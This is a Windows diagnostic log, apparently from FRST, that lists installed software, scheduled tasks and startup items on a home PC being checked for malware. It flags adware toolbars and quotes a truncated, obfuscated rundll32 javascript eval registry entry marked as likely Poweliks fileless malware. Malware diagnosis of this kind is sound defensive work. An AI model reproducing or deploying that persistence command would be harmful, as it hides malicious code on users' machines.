Catalyst Control Center Graphics Previews Common (x32 Version: 2012.0808.1024.16666 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2012.0808.1024.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Chinese Standard (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Chinese Traditional (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Czech (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Danish (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Dutch (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help English (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Finnish (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help French (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help German (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Greek (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Hungarian (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Italian (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Japanese (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Korean (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Norwegian (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Polish (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Portuguese (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Russian (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Spanish (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Swedish (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Thai (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
CCC Help Turkish (x32 Version: 2012.0808.1023.16666 - Advanced Micro Devices, Inc.) Hidden
ccc-utility64 (Version: 2012.0808.1024.16666 - Advanced Micro Devices, Inc.) Hidden
CutePDF Writer 3.0 (HKLM\...\CutePDF Writer Installation) (Version:  3.0 - Acro Software Inc.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{60098CE4-EB16-42D1-9FF6-923488C2AB26}) (Version:  - Microsoft)
Emsisoft Anti-Malware (HKLM-x32\...\{5502032C-88C1-4303-99FE-B5CBD7684CEA}_is1) (Version: 9.0 - Emsisoft GmbH)
File Association Helper (HKLM\...\{C168639F-5810-4EC8-B1E8-0251AA8A771C}) (Version: 1.2.225.65451 - WinZip Computing International, LLC)
Five Nights at Freddy's (HKLM-x32\...\Steam App 319510) (Version:  - Scott Cawthon)
FormsWorkFlow 2007 (HKLM-x32\...\{4D3D1B2B-9ECE-4B3C-8579-D4BF918BB8C4}) (Version: 4.2.12 - American LegalNet, Inc.)
GamingWonderland Internet Explorer Toolbar (HKLM-x32\...\GamingWonderlandbar Uninstall Internet Explorer) (Version:  - Mindspark Interactive Network) <==== ATTENTION
HP Officejet 6600 Basic Device Software (HKLM\...\{B407F586-D027-45C3-9109-CC2943E839FA}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Officejet 6600 Help (HKLM-x32\...\{2FA81482-5570-4CF0-9A10-D61D2F164916}) (Version: 140.0.2.2 - Hewlett Packard)
HP Support Solutions Framework (HKLM-x32\...\{44157EB3-D8D0-4BB1-B0F5-AD2C38814ED1}) (Version: 11.51.0027 - Hewlett-Packard Company)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
iTunes (HKLM\...\{1CF5754A-545B-4360-BFDE-2847BC728DFC}) (Version: 11.2.0.115 - Apple Inc.)
Java 7 Update 67 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F06417067FF}) (Version: 7.0.670 - Oracle)
Junk Mail filter update (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)
Microsoft Office 2010 Service Pack 1 (SP1) (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version:  - Microsoft)
Microsoft Office 2010 Service Pack 1 (SP1) (x32 Version:  - Microsoft) Hidden
Microsoft Office Access MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Home and Student 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.6029.1000 - Microsoft Corporation)
Microsoft Office Office 64-bit Components 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010 (Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Single Image 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2010 (x32 Version: 14.0.6029.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20125.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (Version: 12.0.21005 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (Version: 12.0.21005 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (x32 Version: 12.0.21005 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (x32 Version: 12.0.21005 - Microsoft Corporation) Hidden
Movie Maker (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.1 - Nikon)
Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.9.2 - Nikon)
Origin (HKLM-x32\...\Origin) (Version: 9.4.7.2799 - Electronic Arts, Inc.)
Pdf995 (HKLM-x32\...\Pdf995) (Version:  - )
Photo Gallery (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
Premium Sound HD (HKLM\...\{94F03B8E-CB73-4653-AFE9-79112C01FED2}) (Version: 1.12.4600 - SRS Labs, Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.3.730.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6687 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM-x32\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.8400.30136 - Realtek Semiconductor Corp.)
Realtek WLAN Driver (HKLM-x32\...\{9D3D8C60-A55F-4fed-B2B9-173001290E16}) (Version: 2.00.0020 - REALTEK Semiconductor Corp.)
SPORE™ (HKLM-x32\...\{9DF0196F-B6B8-4C3A-8790-DE42AA530101}) (Version: 1.00.0000 - Electronic Arts)
Steam (HKLM-x32\...\Steam) (Version:  - Valve Corporation)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.10.3 - Synaptics Incorporated)
The Sims™ 3 (HKLM-x32\...\{C05D8CDB-417D-4335-A38C-A0659EDFD6B8}) (Version: 1.67.2 - Electronic Arts)
The Sims™ 3 Generations (HKLM-x32\...\{E6B88BD6-E4B2-4701-A648-B6DAC6E491CC}) (Version: 8.0.152 - Electronic Arts)
The Sims™ 3 Late Night (HKLM-x32\...\{45057FCE-5784-48BE-8176-D9D00AF56C3C}) (Version: 6.5.1 - Electronic Arts)
The Sims™ 3 Pets (HKLM-x32\...\{C12631C6-804D-4B32-B0DD-8A496462F106}) (Version: 10.0.96 - Electronic Arts)
The Sims™ 3 Supernatural (HKLM-x32\...\{B37DAFA5-717D-41F8-BDFB-3A4B68C0B3A1}) (Version: 15.0.135 - Electronic Arts)
The Sims™ 4 (HKLM-x32\...\{48EBEBBF-B9F8-4520-A3CF-89A730721917}) (Version: 1.0.732.20 - Electronic Arts Inc.)
Toshiba App Place (HKLM-x32\...\{ED3CBA78-488F-4E8C-B33F-8E3BF4DDB4D2}) (Version: 1.0.6.3 - Toshiba)
TOSHIBA Application Installer (HKLM-x32\...\{970472D0-F5F9-4158-A6E3-1AE49EFEF2D3}) (Version: 9.0.1.4 - TOSHIBA)
TOSHIBA Desktop Assist (HKLM\...\{95CCACF0-010D-45F0-82BF-858643D8BC02}) (Version: 1.00.0007.00002 - Toshiba Corporation)
TOSHIBA eco Utility (HKLM\...\{5944B9D4-3C2A-48DE-931E-26B31714A2F7}) (Version: 2.0.0.6414 - Toshiba Corporation)
TOSHIBA Function Key (HKLM\...\{16562A90-71BC-41A0-B890-D91B0C267120}) (Version: 1.00.6425 - Toshiba Corporation)
Toshiba Password Utility (HKLM-x32\...\InstallShield_{6D35FF17-A8B3-43D3-917E-5A1F2C3FB628}) (Version: 2.00.800 - Toshiba Corporation)
Toshiba Password Utility (x32 Version: 2.00.800 - Toshiba Corporation) Hidden
TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.8.17.640104 - Toshiba Corporation)
TOSHIBA Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.0.8 - TOSHIBA)
TOSHIBA Recovery Media Creator (HKLM-x32\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.2.0.54043005 - Toshiba Corporation)
TOSHIBA Resolution+ Plug-in for Windows Media Player (HKLM-x32\...\{6CB76C9D-80C2-4CB3-A4CD-D96B239E3F94}) (Version: 1.2.1.00 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM\...\{FBFCEEA5-96EA-4C8E-9262-43CBBEBAE413}) (Version: 2.6.8 - Toshiba Corporation)
TOSHIBA System Driver (HKLM-x32\...\{1E6A96A1-2BAB-43EF-8087-30437593C66C}) (Version: 1.00.0012 - Toshiba Corporation)
TOSHIBA System Settings (HKLM-x32\...\{05A55927-DB9B-4E26-BA44-828EBFF829F0}) (Version: 1.00.0001.32002 - Toshiba Corporation)
TOSHIBA User's Guide (HKLM-x32\...\{3384E1D9-3F18-4A98-8655-180FEF0DFC02}) (Version: 1.00.02 - TOSHIBA)
TOSHIBA VIDEO PLAYER (HKLM\...\{FF07604E-C860-40E9-A230-E37FA41F103A}) (Version: 5.1.0.12-A - Toshiba Corporation)
TOSHIBARegistration (HKLM-x32\...\{5AF550B4-BB67-4E7E-82F1-2C4300279050}) (Version: 1.1.6 - TOSHIBA)
Unity Web Player (HKCU\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Update for Microsoft Office 2010 (KB2553065) (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{A8686D24-1E89-43A1-973E-05A258D2B3F8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553181) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{48E1B6C2-7299-4F3F-AA63-42F0ACE55AA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553267) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{18B3CF2A-73F7-4716-B1AE-86D68726D408}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2553310) 32-Bit Edition (HKLM-x32\...\{90140000-006E-0409-0000-0000000FF1CE}_Office14.SingleImage_{73E67A3A-8D61-44EF-90C2-1697C3DBE668}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2566458) (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{EFB525A0-E1C0-4E32-9968-FE401BC87363}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2596964) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{ED31DE9A-3E13-4E2C-9106-E0D8AFFB9FA6}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2598242) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.SingleImage_{C4F26A9B-B121-4135-8084-A0D9C780C7C8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2598242) 32-Bit Edition (HKLM-x32\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.SingleImage_{460FF681-BC66-4C38-99DF-7012E03F1EBA}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2598242) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.SingleImage_{C633216E-FF30-45B6-B2AB-21922A9353EF}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687509) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{1CBEDB37-C438-473F-8BA0-2535B0D237E2}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687509) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{1CBEDB37-C438-473F-8BA0-2535B0D237E2}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2553290) 32-Bit Edition (HKLM-x32\...\{90140000-00A1-0409-0000-0000000FF1CE}_Office14.SingleImage_{9865DC3A-2898-48D9-B96A-46397571C934}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2687277) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{DFE7321B-F914-4AB5-8C74-1F8CC932B1B0}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2687277) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DFE7321B-F914-4AB5-8C74-1F8CC932B1B0}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687623) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{47894754-0FEC-4920-9A65-6C1E732587AC}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687623) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{326F9E80-FE16-4D2A-827A-4EE1A87B1CE8}) (Version:  - Microsoft)
Update for Microsoft Outlook Social Connector 2010 (KB2553406) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{1EEFF749-6F29-4F0B-AB08-4C6EA52AA110}) (Version:  - Microsoft)
Update for Microsoft Outlook Social Connector 2010 (KB2553406) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{BC6DFBFD-16DD-47E1-A7EF-2C062930FA4F}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2589371) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{5DA2D071-A54C-47C0-83E5-43C63DBFD936}) (Version:  - Microsoft)
ViewNX 2 (HKLM-x32\...\{E64C137C-D0B7-467A-B47F-460AAB30F0A3}) (Version: 2.10.0 - Nikon)
Visual Studio 2010 x64 Redistributables (HKLM\...\{21B133D6-5979-47F0-BE1C-F6A6B304693F}) (Version: 13.0.0.1 - AVG Technologies)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WildTangent Games (HKLM-x32\...\WildTangent toshiba Master Uninstall) (Version: 1.0.3.0 - WildTangent)
Windows Live Communications Platform (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live Writer (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Windows Live Writer Resources (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
WinRAR 5.01 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH)
WinZip 17.5 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240DD}) (Version: 17.5.10562 - WinZip Computing, S.L. )
Wizard101 (HKLM-x32\...\{A9E27FF5-6294-46A8-B8FD-77B1DECA3021}) (Version: 1.0.0 - KingsIsle Entertainment, Inc.)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-3754358886-4043612072-4009104627-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points  =========================

Could not list Restore Points. Check "winmgmt" service or repair WMI.


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2012-07-25 22:26 - 2012-07-25 22:26 - 00000824 ____A C:\windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {1AAFF332-5C62-4558-9991-DAA649C4C9C5} - System32\Tasks\Microsoft\Windows\Sysmain\WsSwapAssessmentTask => Rundll32.exe sysmain.dll,PfSvWsSwapAssessmentTask
Task: {23A5D8BE-9196-40EB-BD89-794398B2B073} - System32\Tasks\Microsoft\Windows\WS\WSRefreshBannedAppsListTask => Rundll32.exe WSClient.dll,RefreshBannedAppsList
Task: {385A4F92-1400-4CAC-A0E8-955B091FA0A7} - System32\Tasks\Norton Anti-Theft\Norton Error Processor => C:\Program Files (x86)\Norton Anti-Theft\Engine\1.6.0.17\SymErr.exe
Task: {468ECC2C-5F2E-404F-88D8-C595C9D3DBCE} - System32\Tasks\TOSHIBA\Service Station => C:\Program Files\TOSHIBA\Toshiba Service Station\ToshibaServiceStation.exe [2013-07-31] (TOSHIBA Corporation)
Task: {58397DF5-B94B-409A-B346-80222CFC0CA7} - System32\Tasks\Norton Anti-Theft\Norton Error Analyzer => C:\Program Files (x86)\Norton Anti-Theft\Engine\1.6.0.17\SymErr.exe
Task: {599294A0-CDB1-49FE-9AE6-B04A968C2C28} - System32\Tasks\Microsoft\Windows\Setup\Pre-staged GDR Notification => C:\Windows\system32\NotificationUI.exe [2014-01-30] (Microsoft Corporation)
Task: {A72208BF-7A49-4FB8-B684-252375F3443A} - System32\Tasks\Microsoft\Windows\WS\License Validation => Rundll32.exe WSClient.dll,WSpTLR licensing
Task: {AD69A4FC-E4A2-4DEB-A8AB-7287E6920A90} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\windows\system32\MRT.exe [2014-08-29] (Microsoft Corporation)
Task: {C6A88F2D-53D2-4805-9D69-443738A1847C} - System32\Tasks\Microsoft\Windows\ApplicationData\CleanupTemporaryState => Rundll32.exe Windows.Storage.ApplicationData.dll,CleanupTemporaryState
Task: {EA06B0D5-285B-4E3A-85F0-8B88E7091C38} - System32\Tasks\Synaptics TouchPad Enhancements => \Program Files\Synaptics\SynTP\SynTPEnh.exe [2012-08-14] (Synaptics Incorporated)
Task: {EBF06DEC-4228-4813-AC0C-62821AE4E330} - System32\Tasks\Microsoft\Windows\Application Experience\StartupAppTask => Rundll32.exe Startupscan.dll,SusRunTask
Task: {FA08CFE5-C5DF-4E3D-879C-2B3489D55E86} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - Jeremy and Heidi) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: C:\windows\Tasks\SlimCleaner Plus (Scheduled Scan - Jeremy and Heidi).job => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe

==================== Loaded Modules (whitelisted) =============

2011-10-13 14:38 - 2011-10-13 14:38 - 00156672 _____ () C:\Program Files (x86)\Toshiba\Password Utility\GFNEXSrv.exe
2014-10-10 08:21 - 2013-10-23 14:24 - 00087600 _____ () C:\windows\System32\cpwmon64.dll
2012-12-23 08:59 - 2012-04-26 14:51 - 00040448 _____ () C:\windows\System32\pdf995mon64.dll
2012-07-18 18:38 - 2012-07-18 18:38 - 00020904 _____ () C:\Program Files\TOSHIBA\Hotkey\SmoothView.dll
2012-07-18 18:38 - 2012-07-18 18:38 - 00049064 _____ () C:\Program Files\TOSHIBA\Hotkey\Hotkey\FnZ.dll
2012-08-13 19:13 - 2012-08-13 19:13 - 00018344 _____ () C:\Program Files\Toshiba\Teco\TecoMUI.dll
2014-09-16 02:46 - 2014-09-16 02:46 - 01179136 _____ () C:\windows\assembly\NativeImages_v4.0.30319_64\Windows.UI\438057c9ea3d42094b63672e9ad4f7e0\Windows.UI.ni.dll
2012-07-25 13:44 - 2012-07-25 13:35 - 00036864 _____ () C:\windows\system32\WinMetadata\Windows.Data.winmd
2014-09-16 02:46 - 2014-09-16 02:46 - 00295936 _____ () C:\windows\assembly\NativeImages_v4.0.30319_64\Windows.Foundation\113ed856861028cde117d9ead96a8717\Windows.Foundation.ni.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CleanHlp => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CleanHlp.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CleanHlp => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CleanHlp.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run: => "SRS Premium Sound HD"
HKLM\...\StartupApproved\Run: => "GamingWonderland Home Page Guard 64 bit"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "Zwinky_5q Browser Plugin Loader 64"
HKLM\...\StartupApproved\Run32: => "GamingWonderland EPM Support"
HKLM\...\StartupApproved\Run32: => "GamingWonderland Search Scope Monitor"
HKLM\...\StartupApproved\Run32: => "GamingWonderland Browser Plugin Loader 64"
HKLM\...\StartupApproved\Run32: => "GamingWonderland Browser Plugin Loader"
HKCU\...\StartupApproved\StartupFolder: => "OneNote 2010 Screen Clipper and Launcher.lnk"
HKCU\...\StartupApproved\Run: => "SlimCleaner Plus"

========================= Accounts: ==========================

Administrator (S-1-5-21-3754358886-4043612072-4009104627-500 - Administrator - Disabled)
Guest (S-1-5-21-3754358886-4043612072-4009104627-501 - Limited - Disabled)
